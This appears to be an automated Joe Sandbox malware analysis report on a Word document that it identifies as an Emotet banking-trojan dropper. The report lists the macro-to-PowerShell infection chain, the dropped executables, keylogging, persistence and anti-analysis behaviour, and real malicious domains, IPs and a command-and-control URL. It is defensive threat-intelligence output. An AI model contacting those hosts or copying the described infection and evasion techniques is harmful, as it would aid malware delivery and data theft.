Analysis Report Nuovo_documento_2019.09.20.doc

Overview

General Information

Joe Sandbox Version:26.0.0 Aquamarine
Analysis ID:961422
Start date:20.09.2019
Start time:13:28:47
Joe Sandbox Product:Cloud
Overall analysis duration:0h 9m 19s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Nuovo_documento_2019.09.20.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:13
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.evad.winDOC@18/52@1/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 90.5% (good quality ratio 87.9%)
  • Quality average: 82.2%
  • Quality standard deviation: 25.6%
HCA Information:
  • Successful, ratio: 84%
  • Number of executed functions: 133
  • Number of non-executed functions: 301
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy:Threshold
Score:100
Range:0 - 100
Whitelisted:false
Threat:Emotet
Detection:malicious

Confidence

Strategy:Threshold
Score:5
Range:0 - 5
Further Analysis Required?:false


Analysis Advice

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts 1 | Windows Management Instrumentation 1 | Valid Accounts 1 | Valid Accounts 1 | Software Packing 2 | Input Capture 11 | System Time Discovery 1 | Remote File Copy 2 | Input Capture 11 | Data Encrypted 12 | Uncommonly Used Port 1
Replication Through Removable Media | PowerShell 2 | Modify Existing Service 11 | Access Token Manipulation 1 | Disabling Security Tools 1 | Network Sniffing | Security Software Discovery 13 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Remote File Copy 2
Drive-by Compromise | Scripting 12 | New Service 12 | Process Injection 3 | Deobfuscate/Decode Files or Information 11 | Input Capture | System Service Discovery 1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Cryptographic Protocol 22
Exploit Public-Facing Application | Execution through API 1 | System Firmware | New Service 12 | Scripting 12 | Credentials in Files | File and Directory Discovery 11 | Logon Scripts | Input Capture | Data Encrypted | Standard Non-Application Layer Protocol 2
Spearphishing Link | Exploitation for Client Execution 3 | Shortcut Modification | File System Permissions Weakness | Obfuscated Files or Information 2 | Account Manipulation | System Information Discovery 45 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Application Layer Protocol 2
Spearphishing Attachment | Command-Line Interface 11 | Modify Existing Service | New Service | Masquerading 2 | Brute Force | Query Registry 1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port
Spearphishing via Service | Service Execution 2 | Path Interception | Scheduled Task | Valid Accounts 1 | Two-Factor Authentication Interception | Process Discovery 2 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port
Supply Chain Compromise | Third-party Software | Logon Scripts | Process Injection | Access Token Manipulation 1 | Bash History | Application Window Discovery 1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol
Trusted Relationship | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection 3 | Input Prompt | Remote System Discovery 1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption

Signature Overview

AV Detection:

Antivirus or Machine Learning detection for sample
  • Source: Nuovo_documento_2019.09.20.doc, Joe Sandbox ML: detected
Multi AV Scanner detection for dropped file
  • Source: C:\Users\user\982.exe, Virustotal: Detection: 15%
Multi AV Scanner detection for submitted file
  • Source: Nuovo_documento_2019.09.20.doc, Virustotal: Detection: 22%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
  • Source: C:\Users\user\982.exe, Code function: 7_2_0040207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash
  • Source: C:\Users\user\982.exe, Code function: 7_2_00401F56 CryptGetHashParam
  • Source: C:\Users\user\982.exe, Code function: 7_2_0040215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash
  • Source: C:\Users\user\982.exe, Code function: 7_2_00401F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext
  • Source: C:\Users\user\982.exe, Code function: 7_2_00401F11 CryptExportKey
  • Source: C:\Users\user\982.exe, Code function: 7_2_00401FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_00401F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_00401FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_0040207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_00401F56 CryptGetHashParam
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_0040215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_00401F11 CryptExportKey
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_1_00401F75 CryptDecodeObjectEx,LocalFree

Spreading:

Enumerates the file system
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
  • Source: global traffic, DNS query: name: sabiosdelamor.co
Potential document exploit detected (performs HTTP gets)
  • Source: global traffic, TCP traffic: 192.168.1.16:49163 -> 198.49.65.242:443
Potential document exploit detected (unknown TCP traffic)
  • Source: global traffic, TCP traffic: 192.168.1.16:49163 -> 198.49.65.242:443

Networking:

Detected TCP or UDP traffic on non-standard ports
  • Source: global traffic, TCP traffic: 192.168.1.16:49164 -> 149.167.86.174:990
IP address seen in connection with other malware
  • Source: Joe Sandbox View, IP Address: 149.167.86.174
JA3 SSL client fingerprint seen in connection with other malware
  • Source: Joe Sandbox View, JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Connects to IPs without corresponding DNS lookups
  • Source: unknown, TCP traffic detected without corresponding DNS query: 149.167.86.174
  • Source: unknown, TCP traffic detected without corresponding DNS query: 181.164.8.25
Contains functionality to download additional files from the internet
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_00401383 InternetReadFile
Downloads files
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Performs DNS lookups
  • Source: unknown, DNS traffic detected: queries for: sabiosdelamor.co
Urls found in memory or binary data
  • Source: sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmp, String found in binary or memory: http://181.164.8.25/attrib/schema/pdf/merge/
  • Source: sortedwatched.exe, 0000000C.00000002.559572605.00224000.00000004.00000020.sdmp, String found in binary or memory: http://181.164.8.25/attrib/schema/pdf/merge/n
Uses HTTPS
  • Source: unknown, Network traffic detected: HTTP traffic on port 49163 -> 443
  • Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49163

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes
  • Source: C:\Users\user\982.exe, Code function: 4_2_00403930 GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState

E-Banking Fraud:

Detected Emotet e-Banking trojan
  • Source: C:\Users\user\982.exe, Code function: 7_2_0040F504
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_0040F504

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
  • Source: C:\Users\user\982.exe, Code function: 7_2_00401F75 CryptAcquireContextW,CryptImportKey,LocalFree,CryptReleaseContext
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_00401F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  • Source: Document image extraction number: 0, Screenshot OCR: Enable Editing and Enable Content. Type: Microsoft Word Document
Document contains an embedded VBA macro which may check the recent opened files (possible anti-VM)
  • Source: Nuovo_documento_2019.09.20.doc, OLE, VBA macro line: If RecentFiles.Count > 3 Then
Powershell drops PE file
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\982.exe
Contains functionality to call native functions
  • Source: C:\Users\user\982.exe, Code function: 4_2_00522670 NtResumeThread
  • Source: C:\Users\user\982.exe, Code function: 4_2_00522630 NtWriteVirtualMemory
  • Source: C:\Users\user\982.exe, Code function: 4_2_005226D0 NtMapViewOfSection
  • Source: C:\Users\user\982.exe, Code function: 4_2_005226B0 NtCreateSection
  • Source: C:\Users\user\982.exe, Code function: 6_2_00492670 NtResumeThread
  • Source: C:\Users\user\982.exe, Code function: 6_2_00492630 NtWriteVirtualMemory
  • Source: C:\Users\user\982.exe, Code function: 6_2_004926D0 NtMapViewOfSection
  • Source: C:\Users\user\982.exe, Code function: 6_2_004926B0 NtCreateSection
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 9_2_005A2670 NtResumeThread
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 9_2_005A2630 NtWriteVirtualMemory
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 9_2_005A26D0 NtMapViewOfSection
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 9_2_005A26B0 NtCreateSection
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 11_2_005B2670 NtResumeThread
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 11_2_005B2630 NtWriteVirtualMemory
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 11_2_005B26D0 NtMapViewOfSection
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: 11_2_005B26B0 NtCreateSection
Contains functionality to delete services
  • Source: C:\Users\user\982.exe, Code function: 7_2_0040F6D0 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle
Contains functionality to launch a process as a different user
  • Source: C:\Users\user\982.exe, Code function: 7_2_00401D2B CreateProcessAsUserW,CreateProcessW
Creates files inside the system directory
  • Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe, File created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat
Creates mutexes
  • Source: C:\Windows\System32\sortedwatched.exe, Mutant created: \BaseNamedObjects\Global\I3C4E0000
  • Source: C:\Users\user\982.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\I3C4E0000
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
  • Source: C:\Users\user\982.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\M3C4E0000
  • Source: C:\Windows\System32\sortedwatched.exe, Mutant created: \BaseNamedObjects\Global\M3C4E0000
Detected potential crypto function
Document contains an ObjectPool stream indicating possible embedded files or OLE objects
  • Source: Nuovo_documento_2019.09.20.doc, OLE indicator, ObjectPool: true
Document contains an embedded VBA macro which executes code when the document is opened / closed
  • Source: Nuovo_documento_2019.09.20.doc, OLE, VBA macro line: Sub autoopen()
  • Source: VBA code instrumentation, OLE, VBA macro: Module JIodCjfv, Function autoopen, Name: autoopen
Document contains embedded VBA macros
  • Source: Nuovo_documento_2019.09.20.doc, OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
  • Source: Joe Sandbox View, Dropped File: C:\Users\user\982.exe 8743FB2C992EE623779B119C5BB06F9A523E2F335B0E64B8E133C4867295CE3C
Found potential string decryption / allocating functions
  • Source: C:\Users\user\982.exe, Code function: String function: 0042922B appears 129 times
  • Source: C:\Users\user\982.exe, Code function: String function: 00429338 appears 52 times
PE file contains strange resources
  • Source: 982.exe.2.dr, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts file
  • Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File read: C:\Windows\System32\drivers\etc\hosts
  • Source: C:\Windows\System32\sortedwatched.exe, File read: C:\Windows\System32\drivers\etc\hosts
Yara signature match
  • Source: type: MEMORY dumps and type: UNPACKEDPE images of 982.exe and sortedwatched.exe, Matched rule: Emotet author = JPCERT/CC Incident Response Group, description = detect Emotet in memory, rule_usage = memory scan, reference = internal research
Classification label
  • Source: classification engine, Classification label: mal100.bank.evad.winDOC@18/52@1/3
Contains functionality to create services
  • Source: C:\Users\user\982.exe, Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle, 7_2_0040F7A0
  • Source: C:\Users\user\982.exe, Code function: OpenSCManagerW,_snwprintf,CreateServiceW, 7_1_0040F7A0
  • Source: C:\Windows\System32\sortedwatched.exe, Code function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle, 12_2_0040F7A0
Contains functionality to enum processes or threads
  • Source: C:\Users\user\982.exe, Code function: 5_2_00401943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Contains functionality to instantiate COM classes
  • Source: C:\Users\user\982.exe, Code function: 4_2_0041286F __EH_prolog3_GS,_memset,GetVersionExW,_malloc,_memset,_DebugHeapAllocator,_wcschr,CoInitializeEx,CoCreateInstance
Contains functionality to load and extract PE file embedded resources
  • Source: C:\Users\user\982.exe, Code function: 4_2_004190A2 LoadResource,LockResource,_malloc,GetSysColor,GetSysColor,GetSysColor,GetSysColor,GetDC,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SelectObject,StretchDIBits,SelectObject,DeleteDC,ReleaseDC,FreeResource
Contains functionality to modify services (start/stop/modify)
  • Source: C:\Users\user\982.exe, Code function: 7_2_0040F7A0 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle
Creates files inside the user directory
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\Desktop\~$ovo_documento_2019.09.20.doc
Creates temporary files
  • Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user~1\AppData\Local\Temp\CVR81DD.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word file
  • Source: Nuovo_documento_2019.09.20.doc, OLE indicator, Word Document stream: true
Document contains summary information with irregular field values
  • Source: Nuovo_documento_2019.09.20.doc, OLE document summary: title field not present or empty
  • Source: Nuovo_documento_2019.09.20.doc, OLE document summary: edited time not present or 0
Found command line output
Might use command line arguments
Source: C:\Users\user\982.exe, Command line argument: PB4_2_0042E6A0
Parts of this application are using the .NET runtime (Probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Sample is known by Antivirus
Source: Nuovo_documento_2019.09.20.doc, Virustotal: Detection: 22%
Sample requires command line parameters (based on API chain)
Source: C:\Users\user\982.exe, Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_5-2847
Spawns processes
Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod
Source: unknown, Process created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: unknown, Process created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: unknown, Process created: C:\Users\user\982.exe --4e722ada
Source: unknown, Process created: C:\Users\user\982.exe --4e722ada
Source: unknown, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
Source: unknown, Process created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: unknown, Process created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: unknown, Process created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: unknown, Process created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: C:\Users\user\982.exe, Process created: C:\Users\user\982.exe 'C:\Users\user\982.exe'
Source: C:\Users\user\982.exe, Process created: C:\Users\user\982.exe --4e722ada
Source: C:\Users\user\982.exe, Process created: C:\Users\user\982.exe --4e722ada
Source: C:\Windows\System32\sortedwatched.exe, Process created: C:\Windows\System32\sortedwatched.exe C:\Windows\system32\sortedwatched.exe
Source: C:\Windows\System32\sortedwatched.exe, Process created: C:\Windows\System32\sortedwatched.exe --2a75e385
Source: C:\Windows\System32\sortedwatched.exe, Process created: C:\Windows\System32\sortedwatched.exe --2a75e385
Uses an in-process (OLE) Automation server
Source: C:\Users\user\982.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Found graphical window changes (likely an installer)
Source: Window Recorder, Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: ntdll.pdb source: 982.exe, 00000004.00000003.293286536.01BC0000.00000004.00000001.sdmp, 982.exe, 00000006.00000003.297891020.01B50000.00000004.00000001.sdmp, sortedwatched.exe, 00000009.00000003.318288495.00CE0000.00000004.00000001.sdmp, sortedwatched.exe, 0000000B.00000003.322801776.00EB0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb3 source: 982.exe, 00000004.00000003.293286536.01BC0000.00000004.00000001.sdmp, 982.exe, 00000006.00000003.297891020.01B50000.00000004.00000001.sdmp, sortedwatched.exe, 00000009.00000003.318288495.00CE0000.00000004.00000001.sdmp, sortedwatched.exe, 0000000B.00000003.322801776.00EB0000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\982.exe, Unpacked PE file: 5.2.982.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Users\user\982.exe, Unpacked PE file: 7.2.982.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Windows\System32\sortedwatched.exe, Unpacked PE file: 10.2.sortedwatched.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Windows\System32\sortedwatched.exe, Unpacked PE file: 12.2.sortedwatched.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\982.exe, Unpacked PE file: 5.2.982.exe.400000.0.unpack
Source: C:\Users\user\982.exe, Unpacked PE file: 7.2.982.exe.400000.0.unpack
Source: C:\Windows\System32\sortedwatched.exe, Unpacked PE file: 10.2.sortedwatched.exe.400000.0.unpack
Source: C:\Windows\System32\sortedwatched.exe, Unpacked PE file: 12.2.sortedwatched.exe.400000.0.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\982.exe, Code function: 4_2_00432522 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,4_2_00432522
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\982.exe, Code function: 4_2_0042937D push ecx; ret 4_2_00429390
Source: C:\Users\user\982.exe, Code function: 4_2_00429303 push ecx; ret 4_2_00429316
Source: C:\Users\user\982.exe, Code function: 4_2_002D2B12 push eax; ret 4_2_002D2B1C
Source: C:\Users\user\982.exe, Code function: 4_2_002D2CD3 push eax; ret 4_2_002D2CD4
Source: C:\Users\user\982.exe, Code function: 5_2_004123D3 push eax; ret 5_2_004123DD
Source: C:\Users\user\982.exe, Code function: 5_2_00412594 push eax; ret 5_2_00412595
Source: C:\Users\user\982.exe, Code function: 6_2_003F2CD3 push eax; ret 6_2_003F2CD4
Source: C:\Users\user\982.exe, Code function: 6_2_003F2B12 push eax; ret 6_2_003F2B1C
Source: C:\Users\user\982.exe, Code function: 7_2_004123D3 push eax; ret 7_2_004123DD
Source: C:\Users\user\982.exe, Code function: 7_2_00412594 push eax; ret 7_2_00412595
Source: C:\Users\user\982.exe, Code function: 7_1_004123D3 push eax; ret 7_1_004123DD
Source: C:\Users\user\982.exe, Code function: 7_1_00412594 push eax; ret 7_1_00412595
Source: C:\Windows\System32\sortedwatched.exe, Code function: 9_2_003F2CD3 push eax; ret 9_2_003F2CD4
Source: C:\Windows\System32\sortedwatched.exe, Code function: 9_2_003F2B12 push eax; ret 9_2_003F2B1C
Source: C:\Windows\System32\sortedwatched.exe, Code function: 11_2_00502CD3 push eax; ret 11_2_00502CD4
Source: C:\Windows\System32\sortedwatched.exe, Code function: 11_2_00502B12 push eax; ret 11_2_00502B1C
Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_004123D3 push eax; ret 12_2_004123DD
Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_2_00412594 push eax; ret 12_2_00412595
Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_1_004123D3 push eax; ret 12_1_004123DD
Source: C:\Windows\System32\sortedwatched.exe, Code function: 12_1_00412594 push eax; ret 12_1_00412595

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\sortedwatched.exe, Executable created and started: C:\Windows\System32\sortedwatched.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\982.exe
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\982.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\982.exe, PE file moved: C:\Windows\System32\sortedwatched.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\982.exe
Contains functionality to start windows services
Source: C:\Users\user\982.exe, Code function: 7_2_0040F7A0 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0040F7A0

Hooking and other Techniques for Hiding and Protection:

Document contains an embedded VBA macro which may check the recent opened files (possible anti-VM)
Source: Nuovo_documento_2019.09.20.doc, OLE, VBA macro line: If RecentFiles.Count > 3 Then
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\982.exe, File opened: C:\Windows\system32\sortedwatched.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\982.exe, Code function: 4_2_00417380 IsWindowVisible,IsIconic,4_2_00417380
Source: C:\Users\user\982.exe, Code function: 4_2_0040B948 IsIconic,GetWindowPlacement,GetWindowRect,4_2_0040B948
Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\982.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\982.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\sortedwatched.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Windows\System32\sortedwatched.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_12-2912
Source: C:\Users\user\982.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_5-2961
Checks the free space of harddrives
Source: C:\Users\user\982.exe File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate running services
Source: C:\Users\user\982.exe Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle, 7_2_0040F504
Source: C:\Windows\System32\sortedwatched.exe Code function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle, 12_2_0040F504
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\982.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_4-29669
Found large amount of non-executed APIs
Source: C:\Users\user\982.exe API coverage: 6.9 %
Source: C:\Users\user\982.exe API coverage: 6.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920 Thread sleep time: -922337203685477s >= -30000s
